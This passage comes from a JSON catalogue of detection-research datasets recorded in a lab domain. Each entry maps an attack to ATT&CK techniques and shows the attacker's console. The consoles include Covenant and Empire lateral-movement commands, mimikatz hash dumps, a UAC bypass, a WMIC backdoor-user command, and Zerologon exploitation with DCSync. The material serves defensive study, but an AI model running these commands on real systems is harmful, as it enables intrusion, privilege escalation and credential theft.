"2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["SMB CreateRequest"], "description": "This dataset represents a threat actor remotely copying a file over SMB (CreateRequest).", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "datasets": [{"name": "Covenant Remote File Copy"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_copy_smb_CreateRequest.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_copy_smb_CreateRequest.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "Copy", "script": null}], "permissions_required": ["Administrator"], "adversary_view": "[09/22/2020 18:53:30 UTC] Copy completed\n(wardog) > Copy /source:\"C:\\Users\\pgustavo\\Desktop\\GruntHTTP.exe\" /destination:\"\\\\WORKSTATION6\\C$\\ProgramData\\GruntHTTP.exe\"\n\nSuccessfully copied file from: C:\\Users\\pgustavo\\Desktop\\GruntHTTP.exe to: \\\\WORKSTATION6\\C$\\ProgramData\\GruntHTTP.exe"}, "references": null}, "SDWIN-200806022635": {"title": "Covenant SharpSC Create", "id": "SDWIN-200806022635", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC CreateService", "SMB Svcctl"], "description": "This dataset represents adversaries remotely creating a service via RPC methods such as CreateService over SMB named pipes such as svcctl.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_create_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_create_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=create computername=WORKSTATION6 service=Cyb3rWard0g displayname=OTR binpath=C:\\Windows\\System32\\GruntHTTP2.exe\"\n\n[-] Error uninstalling Cyb3rWard0g on WORKSTATION6. Reason: ServiceHandle is invalid.\n\n[*] Attempting to create service Cyb3rWard0g on WORKSTATION6...\n\n[*] Created Cyb3rWard0g Service on WORKSTATION6"}, "references": null}, "SDWIN-200806030120": {"title": "Covenant SharpSC Start", "id": "SDWIN-200806030120", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["RPC StartService", "SMB Svcctl"], "description": "This dataset represents adversaries remotely starting a service via RPC methods such as StartService over SMB named pipes such as svcctl.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_start_dcerpc_smb_svcctl.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_start_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=start computername=WORKSTATION6 service=ikeext\"\n\n[*] Attempting to start service ikeext on WORKSTATION6...\n\n[+] Successfully started ikeext on WORKSTATION6!\n\n  DisplayName: IKE and AuthIP IPsec Keying Modules\n\n  ServiceName: ikeext\n\n  Status     : Running\n\n  CanStop    : True"}, "references": null}, "SDWIN-200806031938": {"title": "Covenant SharpSC Stop Service", "id": "SDWIN-200806031938", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["RPC ControlService", "Stop Service", "SMB Svcctl"], "description": "This dataset represents a threat actor using the RPC ControlService method over SMB to stop a service.", "attack_mappings": [{"technique": "T1021", "sub-technique": "002", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpsc_stop_dcerpc_smb_svcctl.zip"}, {"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpsc_stop_dcerpc_smb_svcctl.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpSC", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSC.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpSC /command:\"action=stop computername=WORKSTATION6 service=ikeext\"\n\n[*] Attempting to stop service ikeext on WORKSTATION6...\n\n[+] Successfully stopped ikeext on WORKSTATION6!\n\n  DisplayName: IKE and AuthIP IPsec Keying Modules\n\n  ServiceName: ikeext\n\n  Status     : Stopped\n\n  CanStop    : False\n  https://github.com/djhohnstein/SharpSC"}, "references": null}, "SDWIN-200806035621": {"title": "Covenant SharpWMI Exec", "id": "SDWIN-200806035621", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod"], "description": "This dataset represents an adversary remotely executing code via WMI. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_sharpwmi_create_dcerpc_wmi.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_sharpwmi_create_dcerpc_wmi.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "SharpWMI", "script": "https://github.com/GhostPack/SharpWMI"}], "permissions_required": ["Administrator"], "adversary_view": "(wardog) > SharpWMI /command:\"action=exec computername=WORKSTATION6 command=\\\"C:\\\\Windows\\\\System32\\\\GruntHTTP2.exe\\\"\"\n\n[*] Host                           : WORKSTATION6\n\n[*] Command                        : \"C:\\\\Windows\\\\System32\\\\GruntHTTP2.exe\"\n\n[*] Creation of process returned   : 0\n\n[*] Process ID                     : 3824"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-200806115603": {"title": "Covenant PowerShell Remoting Command", "id": "SDWIN-200806115603", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["PowerShell Remoting"], "description": "This dataset represents adversaries executing malicious code on remote hosts using PowerShell Remoting (WinRM).", "attack_mappings": [{"technique": "T1021", "sub-technique": "006", "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_psremoting_command.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_psremoting_command.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "PowerShellRemotingCommand", "script": "https://github.com/cobbr/Covenant/blob/master/Covenant/Data/Tasks/SharpSploit.LateralMovement.yaml"}], "permissions_required": ["Administrator"], "adversary_view": "[08/06/2020 15:56:13 UTC] PowerShellRemotingCommand completed\n\n(wardog) > PowerShellRemotingCommand /computername:\"WORKSTATION6\" /command:\"get-process\" /domain:\"theshire.local\" /username:\"pgustavo\" /password:\"W1n1!2019\"\n\nHandles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                     PSComputerName                \n\n-------  ------    -----      -----     ------     --  -- -----------                     --------------                \n\n    259      17     4712      24656       0.58   7996   2 ApplicationFrameHost            WORKSTATION6                  \n\n    118       7     6396      10664       0.03   1356   0 conhost                         WORKSTATION6                  \n\n    612      22     1720       4900       0.69    524   0 csrss                           WORKSTATION6                  \n\n    168      11     1544       4164       0.06    604   1 csrss                           WORKSTATION6                  \n\n    401      14     1664       5168       6.94   2528   2 csrss                           WORKSTATION6                  \n\n    384      15     3648      13620       5.97   2888   2 ctfmon                          WORKSTATION6                  \n\n    135       8     2016      12064       0.19   4952   2 dllhost                         WORKSTATION6                  \n\n    235      22     5100      14172       0.33   5028   2 dllhost                         WORKSTATION6                  \n\n    242      16     3776      12940       0.33   7864   2 dllhost                         WORKSTATION6                  \n\n    665      24    17888      38728       0.27    588   1 dwm                             WORKSTATION6                  \n\n    721      32    31996      69820      19.36   2512   2 dwm                             WORKSTATION6                  \n\n  1961      75    43016     122660      26.72   4156   2 explorer                        WORKSTATION6                  \n\n    32       5     1188       2072       0.03    880   1 fontdrvhost                     WORKSTATION6                  \n\n    32       5     1260       2172       0.08    884   0 fontdrvhost                     WORKSTATION6                  \n\n    32       7     3092       5864       0.75   4084   2 fontdrvhost                     WORKSTATION6                  \n\n      0       0       60          8                 0   0 Idle                            WORKSTATION6                  \n\n    632      34    17136      49032       0.48    608   1 LogonUI                         WORKSTATION6"}, "references": null}, "SDWIN-200806130039": {"title": "Covenant GetDomainGroup Domain Admins", "id": "SDWIN-200806130039", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/08/06", "modification_date": "2020/08/06", "platform": ["Windows"], "type": "atomic", "tags": ["Domain Groups Enumeration", "LDAP SearchRequest"], "description": "This dataset represents a threat actor enumerating the domain groups via LDAP (i.e. SearchRequest Method) in an environment.", "attack_mappings": [{"technique": "T1069", "sub-technique": "002", "tactics": ["TA0007"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/covenant_getdomaingroup_ldap_searchrequest_domain_admins.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/covenant_getdomaingroup_ldap_searchrequest_domain_admins.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "GetDomainGroup", "script": "https://github.com/cobbr/Covenant/blob/19e4a17048ade1b854241bb5d938398860ab5981/Covenant/Data/Tasks/SharpSploit.Enumeration.yaml"}], "permissions_required": ["User"], "adversary_view": "[09/22/2020 18:10:15 UTC] GetDomainGroup completed\n(wardog) > GetDomainGroup /identities:\"Domain Admins\"\nsamaccountname: Domain Admins\nsamaccounttype: GROUP_OBJECT\ndistinguishedname: CN=Domain Admins,CN=Users,DC=theshire,DC=local\ncn: Domain Admins\nobjectsid: S-1-5-21-4228717743-1032521047-1810997296-512\ngrouptype: 0\nadmincount: 1\nname: Domain Admins\ndescription: Designated administrators of the domain\nmemberof: CN=Denied RODC Password Replication Group,CN=Users,DC=theshire,DC=local, CN=Administrators,CN=Builtin,DC=theshire,DC=local\nuseraccountcontrol: 0\nbadpasswordtime: 1/1/0001 12:00:00 AM\npwdlastset: 1/1/0001 12:00:00 AM\nwhencreated: 9/17/2020 3:14:46 PM\nwhenchanged: 9/17/2020 3:29:58 PM\naccountexpires: 1/1/0001 12:00:00 AM\nlastlogon: 1/1/0001 12:00:00 AM\nlastlogoff: 1/1/0001 12:00:00 AM\nobjectcategory: CN=Group,CN=Schema,CN=Configuration,DC=theshire,DC=local\nusnchanged: 12909\ninstancetype: 4\nobjectclass: top, group\niscriticalsystemobject: True\nusncreated: 12345\ndscorepropagationdata: 9/17/2020 3:29:58 PM, 9/17/2020 3:14:47 PM, 1/1/1601 12:04:16 AM\nadspath: LDAP://CN=Domain Admins,CN=Users,DC=theshire,DC=local\nobjectguid: bba6ff30-abfc-4166-b209-5e6edd49366b\nlastlogontimestamp: 1/1/0001 12:00:00 AM"}, "references": null}, "SDWIN-200807103913": {"title": "Empire Mimikatz Lsadump LSA Patch", "id": "SDWIN-200807103913", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2019/05/18", "modification_date": "2020/09/20", "platform": ["Windows"], "type": "atomic", "tags": ["LSASS Memory Credentials Read"], "description": "This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.", "attack_mappings": [{"technique": "T1003", "sub-technique": "001", "tactics": ["TA0006"]}], "notebooks": [{"project": "Threat Hunter Playbook", "name": "LSASS Access from Non System Account", "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html"}], "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_lsadump_patch.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "lsadump", "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"}], "permissions_required": ["Administrator"], "adversary_view": "(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/lsadump*\n(Empire: powershell/credentials/mimikatz/lsadump) > info\n\n              Name: Invoke-Mimikatz LSA Dump\n            Module: powershell/credentials/mimikatz/lsadump\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract a\n  particular user hash from memory. Useful on domain\n  controllers.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com htt\n  ps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#ls\n  a\n\nOptions:\n\n  Name     Required    Value                     Description\n  ----     --------    -------                   -----------\n  Agent    True        B7Y8G4XC                  Agent to run module on.                 \n  Username False                                 Username to extract the hash for, blank \n                                                for all local passwords.                \n\n(Empire: powershell/credentials/mimikatz/lsadump) > execute\n[*] Tasked B7Y8G4XC to run TASK_CMD_JOB\n[*] Agent B7Y8G4XC tasked with task ID 2\n[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/lsadump\n(Empire: powershell/credentials/mimikatz/lsadump) > \nJob started: VGHXZ5\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # lsadump::lsa /patch\nDomain : WORKSTATION5 / S-1-5-21-1549354820-3669603161-4025758380\n\nRID  : 000001f7 (503)\nUser : DefaultAccount\nLM   : \nNTLM : \n\nRID  : 000001f5 (501)\nUser : Guest\nLM   : \nNTLM : \n\nRID  : 000001f4 (500)\nUser : wardog\nLM   : \nNTLM : 42ddb2963bbe8f1c075fc869d3bce33e\n\nRID  : 000001f8 (504)\nUser : WDAGUtilityAccount\nLM   : \nNTLM : 45a313f1860be24e967e55b94649aa31\n\n(Empire: powershell/credentials/mimikatz/lsadump) >"}, "references": ["https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html"]}, "SDWIN-200904032946": {"title": "Invoke BypassUAC FodHelper", "id": "SDWIN-200904032946", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/04", "modification_date": "2020/09/04", "platform": ["Windows"], "type": "atomic", "tags": ["BypassUAC", "Registry Modification", "Windows Registry FodHelper"], "description": "This dataset represents adversaries elevating privileges (bypassing uac) by performing an registry modification for FodHelper.", "attack_mappings": [{"technique": "T1548", "sub-technique": "002", "tactics": ["TA0004"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/privilege_escalation/host/empire_uac_shellapi_fodhelper.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "bypassuac_fodhelper", "script": "https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/Invoke-FodHelperBypass.ps1"}], "permissions_required": ["User"], "adversary_view": "(Empire: SP7B3U2X) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            \nSP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         1376   5/0.0    2020-09-04 07:12:15  http            \n\n(Empire: agents) > interact SP7B3U2X\n(Empire: SP7B3U2X) > \n(Empire: SP7B3U2X) > usemodule privesc/bypassuac_fodhelper\n(Empire: powershell/privesc/bypassuac_fodhelper) > info\n\n              Name: Invoke-FodHelperBypass\n            Module: powershell/privesc/bypassuac_fodhelper\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  Petr Medonos\n\nDescription:\n  Bypasses UAC by performing an registry modification for\n  FodHelper (based\n  onhttps://winscripting.blog/2017/05/12/first-entry-welcome-\n  and-uac-bypass/)\n\nComments:\n  https://winscripting.blog/2017/05/12/first-entry-welcome-\n  and-uac-bypass/\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        SP7B3U2X                  Agent to run module on.                 \n  Listener         True                                  Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/privesc/bypassuac_fodhelper) > set Listener http\n(Empire: powershell/privesc/bypassuac_fodhelper) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked SP7B3U2X to run TASK_CMD_JOB\n[*] Agent SP7B3U2X tasked with task ID 2\n[*] Tasked agent SP7B3U2X to run module powershell/privesc/bypassuac_fodhelper\n(Empire: powershell/privesc/bypassuac_fodhelper) > \nJob started: EHNK23\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent F2X6GE4R checked in\n[+] Initial agent F2X6GE4R from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to F2X6GE4R at 172.18.39.5\n\n(Empire: powershell/privesc/bypassuac_fodhelper) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKU86XWEL ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            \nSP7B3U2X ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         1376   5/0.0    2020-09-04 07:30:33  http            \nF2X6GE4R ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         3936   5/0.0    2020-09-04 07:30:34  http            \n\n\n(Empire: agents) > interact F2X6GE4R\n(Empire: F2X6GE4R) > shell whoami\n[*] Tasked F2X6GE4R to run TASK_SHELL\n[*] Agent F2X6GE4R tasked with task ID 1\n(Empire: F2X6GE4R) > \ntheshire\\pgustavo\n..Command execution"}, "references": ["https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/"]}, "SDWIN-200914080546": {"title": "Empire Remote WMIC Add User", "id": "SDWIN-200914080546", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/14", "modification_date": "2020/09/22", "platform": ["Windows"], "type": "atomic", "tags": ["WMI IWbemServices ExecMethod", "User Backdoor"], "description": "This dataset represents an adversary remotely executing code via WMI to ad a backdoor user on the target system. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.", "attack_mappings": [{"technique": "T1047", "sub-technique": null, "tactics": ["TA0002", "TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_wmic_add_user_backdoor.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Empire", "module": "shell", "script": null}], "permissions_required": ["User"], "adversary_view": "(Empire: agents) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent 6Z78CY25 checked in\n[+] Initial agent 6Z78CY25 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to 6Z78CY25 at 172.18.39.5\nagents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nKFL6CMNZ ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         7584   5/0.0    2020-09-14 11:33:59  http            \nYGBLW8EM ps 172.18.39.5     WORKSTATION5      *THESHIRE\\wardog        powershell         8924   5/0.0    2020-09-14 11:40:53  http            \nUBCKLYFA ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5412   5/0.0    2020-09-14 11:57:16  http            \n\n6Z78CY25 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         9564   5/0.0    2020-09-14 12:02:08  http            \n\n(Empire: agents) > interact 6Z78CY25\n(Empire: 6Z78CY25) > \n(Empire: 6Z78CY25) > shell wmic /node:WORKSTATION6 process call create \"net user /add backdoor pa$$w0rd1\"\n[*] Tasked 6Z78CY25 to run TASK_SHELL\n[*] Agent 6Z78CY25 tasked with task ID 1\n(Empire: 6Z78CY25) > \nExecuting (Win32_Process)->Create()\n\nMethod execution successful.\n\nOut Parameters:\ninstance of __PARAMETERS\n{\n  ProcessId = 7768;\n  ReturnValue = 0;\n};\n\n..Command execution completed.\n\n(Empire: 6Z78CY25) >"}, "references": ["https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"]}, "SDWIN-200916232559": {"title": "Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2", "id": "SDWIN-200916232559", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/16", "modification_date": "2020/09/16", "platform": ["Windows"], "type": "atomic", "tags": ["CVE-2020-1472", "Password Update", "Netlogon Insecure AES-CFB8"], "description": "This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This vulnerability was discovered by [@@SecuraBV](https://twitter.com/SecuraBV).", "attack_mappings": [{"technique": "T1210", "sub-technique": null, "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}, {"type": "tool", "name": "mimikatz", "module": "lsadump", "script": "https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L23"}, {"type": "tool", "name": "SharpZeroLogon", "module": "SharpZeroLogon", "script": "https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon"}], "permissions_required": ["User"], "adversary_view": "Mimikatz Implementation (NetrServerAuthenticate2)\n=================================================\n\n(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe \\\"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\\\" exit\"\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\n\nmimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\n\nTarget : MORDORDC.theshire.local\nAccount: MORDORDC$\nType   : 6 (Server)\nMode   : exploit\n\nTrying to 'authenticate'...\n====================================================\n\nNetrServerAuthenticate2: 0x00000000\nNetrServerPasswordSet2 : 0x00000000\n\n* Authentication: OK -- vulnerable\n* Set password  : OK -- may be unstable\n\nmimikatz(commandline) # exit\n\nBye!\n\nDCSync Follow-up (Optional)\n(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Downloads\\mimikatz_trunk\\x64\\mimikatz.exe \\\"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\\\\"\\\\\" /authntlm\\\" exit\""}, "references": ["https://www.secura.com/blog/zero-logon", "https://www.secura.com/pathtoimg.php?id=2055", "https://twitter.com/gentilkiwi/status/1306178689630076929", "https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon", "https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc#theGroupPolicy"]}, "SDWIN-200917174542": {"title": "DCOM ExecuteExcel4macro", "id": "SDWIN-200917174542", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/18", "modification_date": "2020/09/18", "platform": ["Windows"], "type": "atomic", "tags": ["DCOM"], "description": "This dataset represents adversaries leveraging the COM Method ExecuteExcel4Macro over DCOM to execute Excel4 macros remotely", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_executeexcel4macro_allowed.zip"}, {"type": "Network", "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_executeexcel4macro_allowed.zip"}], "simulation": {"environment": "Mordor shire", "tools": [{"type": "C2", "name": "Covenant", "module": "ShellCmd", "script": "https://github.com/cobbr/Covenant/blob/7555b19ffb9401c0e37094c25e404a640b1688d7/Covenant/Data/Tasks/SharpSploit.Execution.yaml#L96"}], "permissions_required": ["User"], "adversary_view": "(wardog) > ShellCmd /shellcommand:\"C:\\Users\\pgustavo\\Desktop\\MoveExcel4.exe 172.18.39.6"}, "references": ["https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/", "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/covenant_dcom_executeexcel4macro_blocked.zip", ["https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/covenant_dcom_executeexcel4macro_blocked.zip"]]}, "SDWIN-200918145959": {"title": "DCOM RegisterXLL", "id": "SDWIN-200918145959", "contributors": ["Roberto Rodriguez @Cyb3rWard0g"], "creation_date": "2020/09/18", "modification_date": "2020/09/18", "platform": ["Windows"], "type": "atomic", "tags": ["DCOM"], "description": "This dataset represents adversaries leveraging the COM Method RegisterXLL over DCOM to execute an XLL file remotely. The XLL file can exist on the target or externally in an UNC path such as \\\\SERVER\\FILES\\.", "attack_mappings": [{"technique": "T1021", "sub-technique": "003", "tactics": ["TA0008"]}], "notebooks": null, "files": [{"type": "Host", "link": 